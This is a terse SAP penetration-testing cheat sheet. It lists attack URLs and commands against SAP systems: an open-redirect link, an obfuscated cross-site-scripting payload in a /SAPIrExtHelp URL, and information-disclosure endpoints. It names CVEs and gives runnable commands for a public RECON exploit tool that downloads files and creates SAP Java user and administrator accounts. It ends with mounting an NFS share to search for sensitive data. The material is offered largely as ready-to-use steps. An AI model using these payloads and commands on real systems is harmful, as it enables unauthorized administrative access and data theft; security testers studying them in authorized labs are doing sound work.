Bismillah
For conducting the Pentest you should deploy SAP System on your Network
https://HOST/sap/public/bc/icf/logoff?redirecturl=MALICIOUSURL
http://HOST:PORT/startPage
http://HOST:PORT/sap/public/info
http://HOST:PORT/sap/public/info
look for /SAPIrExtHelp https://localhost/SAPIrExtHelp
https://HOST/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp
SAP Information System 1.0 Shell Upload
CVE-2022-22536 (ICMAD SAP)
SAP RECON vulnerability (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/SAP_RECON
Download zip file
python RECON.py -H 172.16.30.8 -f /1111.zip
Create SAP JAVA user
python RECON.py -H 172.16.30.8 -u
Create SAP JAVA Administrator user
python RECON.py -H 172.16.30.8 -a
sslscan
nfs-ls nfs://HOST/mount
mkdir mnt && mount -t nfs HOST:/mount ./mnt
Good luck searching sensitive informations
I am looking for SAP Virtual Machine or container for doing pentest simulation, if you have info please kindly DM me @linkedin)
Sharing is Caring
كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناس"